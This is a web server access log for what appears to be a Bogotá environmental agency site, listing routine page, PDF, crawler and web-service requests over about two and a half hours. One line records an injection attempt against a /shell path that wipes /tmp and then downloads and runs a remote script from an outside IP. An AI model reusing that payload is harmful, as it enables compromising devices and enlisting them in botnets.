201.245.192.253 - - [03/Apr/2023:01:39:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:01:39:47 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 304 -
157.55.39.212 - - [03/Apr/2023:01:40:20 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [03/Apr/2023:01:40:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42992
201.245.192.253 - - [03/Apr/2023:01:40:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42681
216.245.221.92 - - [03/Apr/2023:01:40:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:01:40:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:01:41:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [03/Apr/2023:01:44:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [03/Apr/2023:01:45:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:01:46:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.64 - - [03/Apr/2023:01:48:42 -0500] "-" 408 -
172.22.2.4 - - [03/Apr/2023:01:47:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [03/Apr/2023:01:49:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
40.77.167.162 - - [03/Apr/2023:01:50:17 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Fauna-gif.gif HTTP/1.1" 200 3779027
216.245.221.92 - - [03/Apr/2023:01:50:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:01:52:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:01:54:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:01:53:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [03/Apr/2023:01:55:42 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.10 - - [03/Apr/2023:01:56:40 -0500] "-" 408 -
23.251.102.74 - - [03/Apr/2023:01:58:10 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
66.249.73.63 - - [03/Apr/2023:01:58:28 -0500] "-" 408 -
201.245.192.253 - - [03/Apr/2023:01:59:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:01:58:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [03/Apr/2023:02:00:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:01:59:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55924
131.107.160.108 - - [03/Apr/2023:02:01:30 -0500] "GET /bla/resoluciones/resoluciones%202021/1622.pdf HTTP/1.1" 200 564591
131.107.160.108 - - [03/Apr/2023:02:01:30 -0500] "GET /bla/resoluciones/autos%202020/2397.pdf HTTP/1.1" 200 346294
131.107.160.108 - - [03/Apr/2023:02:01:30 -0500] "GET /bla/resoluciones/resoluciones%202021/0795.pdf HTTP/1.1" 200 508846
131.107.160.108 - - [03/Apr/2023:02:01:30 -0500] "GET /bla/resoluciones/resoluciones%202022/3458.pdf HTTP/1.1" 200 1641724
131.107.160.108 - - [03/Apr/2023:02:01:30 -0500] "GET /bla/resoluciones/resoluciones%202022/2958.pdf HTTP/1.1" 200 920107
131.107.160.108 - - [03/Apr/2023:02:01:30 -0500] "GET /bla/resoluciones/resoluciones%202021/0877.pdf HTTP/1.1" 200 3612124
131.107.160.108 - - [03/Apr/2023:02:01:30 -0500] "GET /bla/resoluciones/resoluciones%202021/0238.pdf HTTP/1.1" 200 355119
172.22.2.4 - - [03/Apr/2023:02:03:44 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [03/Apr/2023:02:04:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
217.182.175.162 - - [03/Apr/2023:02:04:42 -0500] "HEAD /secretaria-de-ambiente-entrego-balance-de-su-gestion-en-2022-y-presento-los-retos-para-el-2023.html HTTP/1.1" 200 -
217.182.175.162 - - [03/Apr/2023:02:04:42 -0500] "HEAD /secretaria-de-ambiente-entrego-balance-de-su-gestion-en-2022-y-presento-los-retos-para-el-2023.html HTTP/1.1" 200 -
34.91.142.213 - - [03/Apr/2023:02:05:24 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [03/Apr/2023:02:05:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:02:04:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
162.55.37.179 - - [03/Apr/2023:02:06:21 -0500] "GET / HTTP/1.1" 200 319
162.55.37.179 - - [03/Apr/2023:02:06:21 -0500] "GET / HTTP/1.1" 200 4720
168.119.48.175 - - [03/Apr/2023:02:06:29 -0500] "GET / HTTP/1.1" 200 4720
168.119.48.175 - - [03/Apr/2023:02:06:30 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [03/Apr/2023:02:04:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
66.249.73.63 - - [03/Apr/2023:02:09:29 -0500] "-" 408 -
201.245.192.253 - - [03/Apr/2023:02:09:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
173.252.107.3 - - [03/Apr/2023:02:10:18 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
216.245.221.92 - - [03/Apr/2023:02:10:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:02:09:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:02:10:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
66.249.66.37 - - [03/Apr/2023:02:12:39 -0500] "-" 408 -
154.89.5.36 - - [03/Apr/2023:02:13:49 -0500] "GET / HTTP/1.1" 200 319
154.89.5.36 - - [03/Apr/2023:02:14:14 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [03/Apr/2023:02:14:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
131.107.160.108 - - [03/Apr/2023:02:14:59 -0500] "GET /bla/resoluciones/resoluciones%202022/3458.pdf HTTP/1.1" 200 1641724
131.107.160.108 - - [03/Apr/2023:02:14:59 -0500] "GET /bla/resoluciones/resoluciones%202021/0877.pdf HTTP/1.1" 200 3612124
131.107.160.108 - - [03/Apr/2023:02:14:59 -0500] "GET /bla/resoluciones/resoluciones%202021/0238.pdf HTTP/1.1" 200 355119
131.107.160.108 - - [03/Apr/2023:02:14:59 -0500] "GET /bla/resoluciones/resoluciones%202021/0795.pdf HTTP/1.1" 200 508846
131.107.160.108 - - [03/Apr/2023:02:14:59 -0500] "GET /bla/resoluciones/resoluciones%202021/1622.pdf HTTP/1.1" 200 564591
131.107.160.108 - - [03/Apr/2023:02:14:59 -0500] "GET /bla/resoluciones/resoluciones%202022/2958.pdf HTTP/1.1" 200 920107
131.107.160.108 - - [03/Apr/2023:02:14:59 -0500] "GET /bla/resoluciones/autos%202020/2397.pdf HTTP/1.1" 200 346294
131.107.160.108 - - [03/Apr/2023:02:14:59 -0500] "GET /bla/resoluciones/resoluciones%202021/4339.pdf HTTP/1.1" 200 441757
216.245.221.92 - - [03/Apr/2023:02:15:42 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.65 - - [03/Apr/2023:02:16:52 -0500] "-" 408 -
172.22.2.4 - - [03/Apr/2023:02:15:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:02:16:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [03/Apr/2023:02:19:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
201.245.192.253 - - [03/Apr/2023:02:20:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43165
201.245.192.253 - - [03/Apr/2023:02:20:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43000
52.167.144.167 - - [03/Apr/2023:02:20:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2131.pdf HTTP/1.1" 200 1275589
216.245.221.92 - - [03/Apr/2023:02:20:42 -0500] "HEAD / HTTP/1.1" 200 -
128.14.209.162 - - [03/Apr/2023:02:21:34 -0500] "GET / HTTP/1.1" 200 319
157.55.39.212 - - [03/Apr/2023:02:23:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/1567.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Apr/2023:02:21:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.88 - - [03/Apr/2023:02:23:44 -0500] "-" 408 -
172.22.2.4 - - [03/Apr/2023:02:22:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [03/Apr/2023:02:24:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [03/Apr/2023:02:25:42 -0500] "HEAD / HTTP/1.1" 200 -
168.119.253.6 - - [03/Apr/2023:02:27:58 -0500] "GET / HTTP/1.1" 200 319
168.119.253.6 - - [03/Apr/2023:02:27:58 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [03/Apr/2023:02:27:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:02:29:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:02:28:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [03/Apr/2023:02:30:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43165
201.245.192.253 - - [03/Apr/2023:02:30:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43000
52.167.144.167 - - [03/Apr/2023:02:30:33 -0500] "GET /BLA/resoluciones/AUTOS%202014/2024.pdf HTTP/1.1" 200 718113
216.245.221.92 - - [03/Apr/2023:02:30:42 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.212 - - [03/Apr/2023:02:31:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/4719.pdf HTTP/1.1" 304 -
66.249.66.65 - - [03/Apr/2023:02:33:42 -0500] "-" 408 -
40.77.167.211 - - [03/Apr/2023:02:33:47 -0500] "GET /BLA/resoluciones/AUTOS%202013/1481.pdf HTTP/1.1" 200 1729700
201.245.192.253 - - [03/Apr/2023:02:34:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:02:33:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.167 - - [03/Apr/2023:02:35:13 -0500] "GET /Residuos/pinturas/files/guia_pinturas.pdf HTTP/1.1" 200 16736247
216.245.221.92 - - [03/Apr/2023:02:35:42 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.167 - - [03/Apr/2023:02:35:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4019.pdf HTTP/1.1" 200 981738
172.22.2.4 - - [03/Apr/2023:02:34:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
74.125.210.209 - - [03/Apr/2023:02:38:38 -0500] "GET /Publicaciones/SSFFS-07337-2021.zip HTTP/1.1" 404 232
64.233.172.31 - - [03/Apr/2023:02:38:39 -0500] "GET /Publicaciones/SSFFS-07673-2021.zip HTTP/1.1" 404 232
64.233.172.1 - - [03/Apr/2023:02:38:40 -0500] "GET /Publicaciones/SSFFS-11233-2021.zip HTTP/1.1" 404 232
74.125.210.212 - - [03/Apr/2023:02:38:41 -0500] "GET /Publicaciones/SSFFS-11604-2021.zip HTTP/1.1" 404 232
64.233.172.4 - - [03/Apr/2023:02:38:57 -0500] "GET /Publicaciones/SSFFS-09984-2021.zip HTTP/1.1" 404 232
201.245.192.253 - - [03/Apr/2023:02:39:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
66.249.73.63 - - [03/Apr/2023:02:39:29 -0500] "-" 408 -
201.245.192.253 - - [03/Apr/2023:02:40:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43165
201.245.192.253 - - [03/Apr/2023:02:40:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43000
216.245.221.92 - - [03/Apr/2023:02:40:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:02:39:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:02:39:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [03/Apr/2023:02:43:13 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [03/Apr/2023:02:44:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
199.16.157.180 - - [03/Apr/2023:02:45:28 -0500] "GET /images/cronica-mujer-biodiveridad-30-noviembre.jpg HTTP/1.1" 200 63270
173.252.107.120 - - [03/Apr/2023:02:45:33 -0500] "GET /semana-ambiental-2022-del-31-de-mayo-al-5-de-junio-se-celebrara-en-bogota.html HTTP/1.1" 206 799
216.245.221.92 - - [03/Apr/2023:02:45:42 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.36 - - [03/Apr/2023:02:45:57 -0500] "-" 408 -
172.22.2.4 - - [03/Apr/2023:02:44:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:02:45:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
34.90.4.87 - - [03/Apr/2023:02:47:41 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
52.167.144.43 - - [03/Apr/2023:02:48:04 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [03/Apr/2023:02:49:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [03/Apr/2023:02:50:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:02:51:46 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [03/Apr/2023:02:50:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:02:51:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [03/Apr/2023:02:54:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
34.141.209.26 - - [03/Apr/2023:02:54:37 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [03/Apr/2023:02:55:42 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.211 - - [03/Apr/2023:02:56:57 -0500] "GET /BLA/resoluciones/AUTOS%202022/0033.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Apr/2023:02:56:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.80 - - [03/Apr/2023:02:59:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0874.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Apr/2023:02:57:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [03/Apr/2023:02:59:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [03/Apr/2023:03:00:42 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.66 - - [03/Apr/2023:03:02:42 -0500] "-" 408 -
172.22.2.4 - - [03/Apr/2023:03:02:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:03:04:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
172.22.2.4 - - [03/Apr/2023:03:03:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
201.245.192.253 - - [03/Apr/2023:03:05:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [03/Apr/2023:03:05:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:03:06:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
66.249.73.35 - - [03/Apr/2023:03:09:29 -0500] "-" 408 -
172.22.2.4 - - [03/Apr/2023:03:08:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.95.24 - - [03/Apr/2023:03:10:31 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
216.245.221.92 - - [03/Apr/2023:03:10:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:03:09:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
173.252.107.19 - - [03/Apr/2023:03:10:55 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 206 1065
52.167.144.167 - - [03/Apr/2023:03:11:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0828.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2023:03:11:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
201.245.192.253 - - [03/Apr/2023:03:12:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
201.245.192.253 - - [03/Apr/2023:03:13:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
40.77.167.211 - - [03/Apr/2023:03:14:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/1720.pdf HTTP/1.1" 304 -
216.245.221.92 - - [03/Apr/2023:03:15:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:03:14:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.43 - - [03/Apr/2023:03:16:18 -0500] "GET /caminatas-ecologicas-en-bogota-inscribete-y-participa-en-los-recorridos-de-abril.html HTTP/1.1" 200 868
172.22.2.4 - - [03/Apr/2023:03:14:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
52.167.144.167 - - [03/Apr/2023:03:17:16 -0500] "GET /BLA/resoluciones/AUTOS%202022/4948.pdf HTTP/1.1" 200 353240
162.243.148.13 - - [03/Apr/2023:03:18:05 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [03/Apr/2023:03:18:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
66.249.66.64 - - [03/Apr/2023:03:18:42 -0500] "-" 408 -
40.77.167.242 - - [03/Apr/2023:03:19:08 -0500] "GET /images/humedal-principal-santa-maria-7-febrero.jpg HTTP/1.1" 200 86406
201.245.192.253 - - [03/Apr/2023:03:20:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42997
201.245.192.253 - - [03/Apr/2023:03:20:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43007
216.245.221.92 - - [03/Apr/2023:03:20:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:03:19:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:03:20:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
201.245.192.253 - - [03/Apr/2023:03:23:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:03:23:52 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
34.91.50.11 - - [03/Apr/2023:03:24:50 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [03/Apr/2023:03:25:42 -0500] "HEAD / HTTP/1.1" 200 -
35.204.179.234 - - [03/Apr/2023:03:26:33 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
40.77.167.211 - - [03/Apr/2023:03:26:56 -0500] "GET /BLA/resoluciones/AUTOS%202014/5803.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Apr/2023:03:25:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.71 - - [03/Apr/2023:03:28:03 -0500] "GET /BLA/resoluciones/AUTOS%202014/5518.pdf HTTP/1.1" 200 689067
52.167.144.71 - - [03/Apr/2023:03:28:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/6833.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Apr/2023:03:26:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
201.245.192.253 - - [03/Apr/2023:03:28:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
201.245.192.253 - - [03/Apr/2023:03:30:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42997
201.245.192.253 - - [03/Apr/2023:03:30:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43007
216.245.221.92 - - [03/Apr/2023:03:30:42 -0500] "HEAD / HTTP/1.1" 200 -
34.141.138.26 - - [03/Apr/2023:03:32:53 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [03/Apr/2023:03:31:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:03:32:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [03/Apr/2023:03:33:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:03:32:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
66.249.66.64 - - [03/Apr/2023:03:34:26 -0500] "-" 408 -
173.252.107.24 - - [03/Apr/2023:03:35:33 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
52.167.144.167 - - [03/Apr/2023:03:35:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4418.pdf HTTP/1.1" 200 355884
216.245.221.92 - - [03/Apr/2023:03:35:42 -0500] "HEAD / HTTP/1.1" 200 -
34.91.142.213 - - [03/Apr/2023:03:36:31 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
52.167.144.71 - - [03/Apr/2023:03:36:33 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
172.22.2.4 - - [03/Apr/2023:03:37:57 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
104.152.52.151 - - [03/Apr/2023:03:38:30 -0500] "GET / HTTP/1.0" 200 319
201.245.192.253 - - [03/Apr/2023:03:38:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:03:37:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.35 - - [03/Apr/2023:03:39:29 -0500] "-" 408 -
172.22.2.4 - - [03/Apr/2023:03:38:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
201.245.192.253 - - [03/Apr/2023:03:40:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42997
201.245.192.253 - - [03/Apr/2023:03:40:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43007
151.233.97.255 - - [03/Apr/2023:03:40:34 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [03/Apr/2023:03:40:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:03:43:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:03:44:00 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [03/Apr/2023:03:44:02 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
172.22.2.4 - - [03/Apr/2023:03:43:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [03/Apr/2023:03:45:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:03:44:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [03/Apr/2023:03:46:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
52.167.144.150 - - [03/Apr/2023:03:47:40 -0500] "GET /BLA/resoluciones/AUTOS%202018/2611.pdf HTTP/1.1" 200 3134504
201.245.192.253 - - [03/Apr/2023:03:48:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [03/Apr/2023:03:50:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:03:49:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.83.8 - - [03/Apr/2023:03:51:14 -0500] "GET /galeria/galeria/fotos/Soratama2P.jpg HTTP/1.1" 200 10548
172.22.2.4 - - [03/Apr/2023:03:49:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
172.22.2.4 - - [03/Apr/2023:03:51:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
35.204.179.234 - - [03/Apr/2023:03:52:24 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [03/Apr/2023:03:53:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
52.167.144.71 - - [03/Apr/2023:03:54:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/1612.pdf HTTP/1.1" 304 -
216.245.221.92 - - [03/Apr/2023:03:55:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:03:54:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:03:55:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
52.167.144.150 - - [03/Apr/2023:03:58:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0514.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2023:03:58:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [03/Apr/2023:04:00:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:04:00:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:04:01:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
201.245.192.253 - - [03/Apr/2023:04:03:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [03/Apr/2023:04:05:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:04:08:14 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C%20401%20de%202010.doc HTTP/1.1" 304 -
172.22.2.4 - - [03/Apr/2023:04:06:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:04:08:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:04:07:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
66.249.73.39 - - [03/Apr/2023:04:09:29 -0500] "-" 408 -
162.55.175.138 - - [03/Apr/2023:04:09:43 -0500] "GET / HTTP/1.1" 200 319
162.55.175.138 - - [03/Apr/2023:04:09:43 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [03/Apr/2023:04:10:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:04:13:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
